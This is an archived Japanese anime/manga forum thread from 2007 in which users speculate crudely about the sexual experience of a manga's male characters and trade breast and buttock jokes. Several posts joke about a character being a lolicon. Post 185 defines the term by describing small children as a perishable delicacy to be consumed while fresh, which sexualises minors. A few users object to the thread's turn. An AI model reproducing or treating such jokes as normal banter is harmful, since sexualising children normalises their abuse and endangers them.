物語中に大陸人がもっと登場してこういうテーマの話もしてほしかったけど
さすがに本筋とずれるし、収拾つかなくなりそうだからなあ

156 :花と名無しさん:2007/01/22(月) 17:09:21 ID:???0
9巻のハイマン氏との遭遇シーンで
「レヴィさんもそういう事をあげつらねないように」とかいってる
勇吹くんの余裕ある表情からすると、
この子は童貞ではないってことでしょうか?

157 :花と名無しさん:2007/01/22(月) 17:51:25 ID:???0
余裕あるか? ユーハに「女の子が笑うかそこで!」とか言ってる辺り、純情っぽい。
むしろカルノ、本当に鞭でしばかれただけなのか。

158 :花と名無しさん:2007/01/22(月) 18:33:56 ID:???0
鉄壱智の発売日が延びたみたいだね
といっても一日だけだが

159 :花と名無しさん:2007/01/22(月) 23:41:14 ID:???0
>>157
うしろ処女が…

160 :花と名無しさん:2007/01/23(火) 01:49:33 ID:???O
アッー

161 :花と名無しさん:2007/01/23(火) 18:07:31 ID:???0
勇吹は学校でそれなりにモテていたんじゃない?
興味蟻ならチャンスはイパーイあったと思ふ

ただあの面倒草刈がオナゴと真面目に付き合う気になるかどうか…

162 :花と名無しさん:2007/01/23(火) 18:35:09 ID:???0
勇吹は裸ナギ相手にあれだったからねぇ
漢だったらあそこは無心で突貫すべき場面
羽とか関係ないですから

163 :花と名無しさん:2007/01/23(火) 19:22:13 ID:???0
>>162
>羽とか関係ないですから

おぬしもかなりの漢じゃのう・・・w

164 :花と名無しさん:2007/01/23(火) 20:36:11 ID:???0
まあ待て話は聞くだからその前に一発…みたいなキャラだったら
面白かったかもしれんがそれは既に魔法士ではないw
神霊眼で乳作りに勤しまない時点で勇吹など漢としては二流と言わざるをえない

165 :花と名無しさん:2007/01/23(火) 21:25:40 ID:???0
主人公が男のなるりの漫画ってヒロインがいないよね。
そのへん腐女子の目を気にしてるんだろうか。


166 :花と名無しさん:2007/01/23(火) 21:57:24 ID:???0
「ヒロインを出す」という発想そのものが出てこないんじゃない?

167 :花と名無しさん:2007/01/23(火) 22:20:14 ID:???0
主人公を女とくっつけたくないとか

168 :花と名無しさん:2007/01/23(火) 23:02:24 ID:???0
>>161>>164
素質はあるんだよねー
ほら、勇歌が今やヒューですからw
親父も若い嫁さん貰ってるしさ

だがいきなり女に目覚めて乳作りなぞ始めたら
成年魔法士になってしまうかも知れんから困るな・・・

169 :花と名無しさん:2007/01/24(水) 00:27:54 ID:???0
乳作りは女に目覚めるとかいう問題なのかw

170 :花と名無しさん:2007/01/24(水) 00:32:52 ID:???0
いや待て
勇吹は乳より尻派なのかもしれん

171 :花と名無しさん:2007/01/24(水) 00:43:57 ID:???0
なにかこう、アークがおっぱいを創ろう(*´д`*)とか言い出しそうな流れですね
より完璧な乳を作った方が人王を継ぐと
凄く平和だw

>>168
ああ、そういえばヒューはおっぱい星人だったよね
そうか、素質は充分なのか…

172 :花と名無しさん:2007/01/24(水) 01:30:19 ID:???0
成年魔法士
自分的にはオケーだな
いやむしろ見たいですやって下さいw


173 :花と名無しさん:2007/01/24(水) 01:47:32 ID:???0
勇吹は尻派希望
あの兄弟が乳と尻とを激しく侃々諤々語り合う様はナイス甘々

174 :花と名無しさん:2007/01/24(水) 02:29:09 ID:???0
勇吹は酒を嗜むように女も嗜む気がする。
カルノは焼肉にハマったように女にハマる気もする。
性教育の大切さを知るレヴィ氏が、二人を軽〜く風俗体験に連れて行くとかな。

ところで、勇吹が乳作りに目覚めた場合、やはり土台はカルノっすか?

175 :花と名無しさん:2007/01/24(水) 04:45:19 ID:???0
カルノは炉専門なんだろうな
だがそれもまたよし
おっぱいとはこの世界を構成する主要な概念の一つである
実数(数値の差だけがその価値の全てではない)はもとより虚数(ぺったんこ)すらも内包するのだ
おっぱいは全てを許容する


…眠い、もうお脳がダメぽ

176 :花と名無しさん:2007/01/24(水) 07:42:48 ID:???O
>>165
いやそこは、なるり自身が腐女子だから…

177 :花と名無しさん:2007/01/24(水) 10:15:39 ID:???0
>>175
いや、ある程度歳いってから
しみじみ炉なタイプだとオモ

とりあえず100人切り逝っとけばヨシ

178 :花と名無しさん:2007/01/24(水) 12:56:56 ID:???0
カルノも勇吹も、年上のおねーさんといろいろ済ませてそうではある。
ただカルノはいろいろ経験しすぎでで吹っ切れちゃってるんだろうねw
相手はどうせ魔術関係の人だろうし、何か異常なことしてそう。そして初体験がアンヌ様ってのもあり得なくはない。

179 :花と名無しさん:2007/01/24(水) 14:32:46 ID:???0
うん。カルノはかなり吹っ切れてますね
セクシャールハーラスメントイブリーン♪
なんて余裕な冗談かましてましたし

それに対して「・・・意外だな」なんて冷や汗かいてたイブキは
ちょっと齧った程度という印象でした
でも本人はカルノより絶対進んでると思ってたんだよねきっと(ry

180 :花と名無しさん:2007/01/24(水) 17:40:24 ID:???0
下世話な妄想がキモイ件について

181 :花と名無しさん:2007/01/24(水) 17:53:03 ID:???0
余裕見せたれ!

182 :花と名無しさん:2007/01/24(水) 23:44:49 ID:???0
炉ってなに

183 :花と名無しさん:2007/01/25(木) 00:08:42 ID:???0
この流れに引いてたのは自分だけじゃなかったようで安心した。

184 :花と名無しさん:2007/01/25(木) 00:45:59 ID:???0
下ネタは話のネタとして許容できる人と出来ない人とがはっきりしてる
年齢とかはあんまり関係ない。どっちの意見が正しいということもない
いやなら普通にやめてくれと言ったらどうだ

185 :花と名無しさん:2007/01/25(木) 01:42:18 ID:???0
>>182
ちっちゃい子
時間経過とともにその価値を減じていく期間限定の至宝
新鮮な内に召しあがらなければならない
北欧、ロシア産等は特に価値が高いと言われる
天敵は巨乳や年増

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)